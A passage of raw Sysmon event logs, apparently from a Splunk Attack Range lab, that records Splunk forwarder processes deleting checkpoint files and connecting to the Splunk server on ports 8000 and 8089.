Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2930A0EF749E7A1EB344FEF8BE02E3A4,SHA256=73DFEA3771DC9B44CF7A0FC27F157E728ED229B0F712BBC80EAE9668719FE55C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061252Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:51.095{7F8C56E7-4E4C-6063-3300-00000000AF01}2364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245929Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:50.657{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64785-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245928Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:51.365{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98A687E0F3F76CAB956C4D7D48D306CB,SHA256=2A9491F085E7086FF606C2E57B27D5C23D1DB1D31EDD92106B4C9F89414D5AC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245927Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:51.365{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F689E719ECC893CF6913680C5928D6C,SHA256=CB9017943A0367DBB460281B0EBFDDA44D517090A36B54FD08748E589EF0C132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245926Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:51.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=672F6111E2438A43AD394FDB18CD9270,SHA256=2594915781F054B6ABC47DCA9800D83288BE80E14186D99F7C8E4D9446E63328,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061254Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:49.904{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54815-false10.0.1.12-8089- 23542300x80000000000000001061253Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:52.188{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E9FD48423CE168D306F1343887A06AC,SHA256=78B661F5FD5BA779882026568DF6CC8716E199D96908C105AE214525AF9D01A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245931Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:52.677{CB4067E1-304B-6062-1200-00000000AF01}1008NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A46B7DF6384870844EDA952A5B5E4B84,SHA256=C9D73E19E87742F17E5DE589C0C47D1E639C0F9C02F3B336F24A5D4B9AB232F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245930Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:52.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAF86C8949C21507D5610F7A3704A710,SHA256=1B4A184654F218EE0BE914AF4A045D611103855CEEEDEF7DC54177D7AE1B3047,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061256Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:53.548{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2D96228848FDBFE0EAC5D9A1C466F99,SHA256=BEAD25AD40B50C4340845325C93F285E391B2DE4640AD533C7F96DB025DACF22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061255Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:53.548{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74064593DFB78D4F182B2A9D30A2DFB7,SHA256=CF8A4722EA44EC43C96B6490CE53C86DC7EEAF2A019CC75FFC7FDB337363E69B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245932Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:53.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0ED8C80FFA2194CA30030A281651179,SHA256=C35462E7816838C722E5E1C7C5BA6CE081059A9C62CE0690507D2A1DE6767AB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061257Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:54.923{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5AF36C87391BC1801FFDC4F7E8A1953,SHA256=03B003C33E9DCA7F5442D60868D9F54408E03B35C178AED66E5F6D30435410E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245934Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:54.021{CB4067E1-30AF-6062-9800-00000000AF01}2672NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245933Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:54.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4F52E1F2245BC86998FD5C15FE05A9C,SHA256=10A729DB189C3AC30996F7B01E5F8739063A9A766266D19C03F82F98FC4047FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061258Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:53.029{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54816-false10.0.1.12-8000- 354300x8000000000000000245937Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:54.437{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64786-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000245936Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:55.083{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9985CD93B8F9861C725ADE9F335E3F32,SHA256=6C353B1494E99AD63D53B65643EFCA435C698162494CC9DEBCC07783571F68B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245935Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:55.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98A687E0F3F76CAB956C4D7D48D306CB,SHA256=2A9491F085E7086FF606C2E57B27D5C23D1DB1D31EDD92106B4C9F89414D5AC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061259Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:56.282{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBF750241ABC31C43328B75C84E5ADEE,SHA256=F99B7716434C8EA0CC763534D0FF960F43234DD48E6BACDBD69387286659EE4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245939Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:56.458{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BE8CD59C60DACFB9BEDECCEA5461FFF,SHA256=75A3255EAF93849572F06521523816DBE03999E117FFCE177899C96237ABE4A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245938Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:56.130{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1497010F344023B61471361BB5F86966,SHA256=07AACA25A463CEC9F4CB7A4D2CCAD1098D2B7AABD8B340B6F790AD667205E550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061262Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:57.658{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B5B3382EEDE8BF2FA9D5CDBB43BFE30E,SHA256=0F1306B85AB1453B9C0E3934C33C81060E5E65D756DDC657D4F22DDD7D546336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061261Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:57.658{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D4249C9A20F2D030C526D16334D7A40,SHA256=FEF228DF536C3903BC3ACF999ABB0877FC68C473779143CAE0A4F9AA32A22C29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061260Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:57.658{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B8E968F82647AF77B2550DA0D3A94D82,SHA256=138FA0548B01130B3C0485BF09AB2477AA3620ADCA5EA1B28A884F378FBD183B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245941Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:57.161{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C32A358716F74DF9AE70E48B69F354F7,SHA256=97A981E121A6355390488C36AF18AA93BCDD2EFEB9853323B94F3B4B21021851,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245940Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:55.656{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64787-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245942Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:58.161{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C353415A4986D8C48FEF9BE9FFEBE97,SHA256=E05738744C40F5DCC53B42C5166283BDC598BC438ACFA06A74CC246C8F9DF5B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061263Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:59.017{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF82A68E89897CC7E87B8523E545787C,SHA256=0645E5B09D15465F7E801C4DF4A9066750E1A4FC1DEF4BC81023C58F6B5C6CF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245943Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:59.161{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D3DF5293C93823228FD658822CAE01F,SHA256=C458AE988BE2CDCED3F1A8D4788DE134F1E05DF12AE33FA987E5A0DDD085F92E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061264Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:00.377{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=792DD8282FED1124A01242DD477D7AB4,SHA256=4C25A34F1606F0FAF4C022B77FB4FCD7C64A880D942C8A1CBBF5C700FAA40256,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245944Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:00.177{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FC41B3D4E3C0F3BD954DCB8AEC31421,SHA256=648B69C28368B309A7EF03D4ECFA89E2055958BC6381DEFE8787797E88057597,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061266Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:58.904{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54817-false10.0.1.12-8000- 23542300x80000000000000001061265Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:01.736{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62368EF632295E93035FCF910E014B89,SHA256=E645CE17C9E6C5F79948106ED3FA4B5AE450FE70C2445137ABD576686A481878,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245945Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:01.177{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D59A09723505E64077555CEF245B4583,SHA256=8DAE86A0C27A52783221A0FAFCA20E262564B9A56D5FF62A41826996022E5293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061267Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:02.424{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9DEB01752EBC8C4E775A813899266AC4,SHA256=A4062B6C924828EC64642088B7BF47D5F3FD3C2B6A60B0177D540DD752A53436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245948Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:02.224{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A96C36B8340712DC8CE91F8DCB8BC33F,SHA256=CF196429C93C506D12A3FC225B9EFADC063A4A3DF4D3EC8733D0901D93DA74CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245947Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:02.224{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E99438459F298C9312C2D803F76A0E91,SHA256=37F5B003F5D97491FEAFC0339A92ABAD8B7DC67E72B1E2DAB9AB6DEC38D04A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245946Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:02.177{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D60FCF7359AD11F1A2A7FEEF234A605A,SHA256=9592E70C4FB1A476442E796AE81EE70645B528E6D703569318ED2F330A558A2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061268Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:03.096{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5F5408DB2D1C39BEAB9A631A1D2E9C6,SHA256=47A4098F65CD968C272112428DB45ED765E65CE3E06CB1BA7037835E5B22926E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245950Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:03.177{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB239AACCCDA9568A91444E8D21733C3,SHA256=775C11E6DDF8DAD9087A805F860B78E4722775EFF23839B90BF46D6C48050636,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245949Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:01.656{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64788-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061269Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:04.455{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=616D7380500A0292348F853594D11D8C,SHA256=3AD8402065DC8A914B0682E81D3923B23BBE4DFDCE34E22FCBB8DB641CFD42F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245951Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:04.240{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=062CADBFA67A8A3275731C744C90CBCB,SHA256=866AC7A809FF1540EF32AF9BC33A36889BC6A0D1BC2C7F614C2B04F72CF7B8BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061270Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:05.830{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C58E9445A111E622D45CFAC58298F7D8,SHA256=BA9A7EC1AB969BD14DA5E5FFE60B9F62572B21906A7124308FB0D49E3216ABA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245952Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:05.286{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F40AD3D95803406E8BE936DB09F4CC1,SHA256=41B5BA12396FDCDB484C876E0443FEE1811579AA5C18E5CA69A22BABE5B41FBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245953Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:06.286{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=395CD4E15A4BDA1CC04B482D3C6F370C,SHA256=BA3D1D97CC701436EB43E6D56FBEFD8FE46F2DBDE8420E89B9FF03C86E21D507,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061272Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:04.826{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54818-false10.0.1.12-8000- 23542300x80000000000000001061271Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:07.190{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C3B709B2243B08EFCA63D69AB6852A,SHA256=C047F9098E01E90EAAAB1FC1CBD9CA0BF13DF3B0DF204FFC7A939F36036E5183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245956Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:07.318{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F830C1FAC4FB18F648B7B92349212091,SHA256=90C82969A66EF18ECAE8BCE2E4DB08BB4B03CB536E0C764E14D36959BD2F5FE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245955Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:07.271{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40A60DC5C6483C575151B001B645301C,SHA256=D4DEE2281CCC248A9B6A9D009376AD686AF2D30FF7C8745F3A2740C0FEDB1EAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245954Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:07.271{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A96C36B8340712DC8CE91F8DCB8BC33F,SHA256=CF196429C93C506D12A3FC225B9EFADC063A4A3DF4D3EC8733D0901D93DA74CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061273Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:08.549{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT 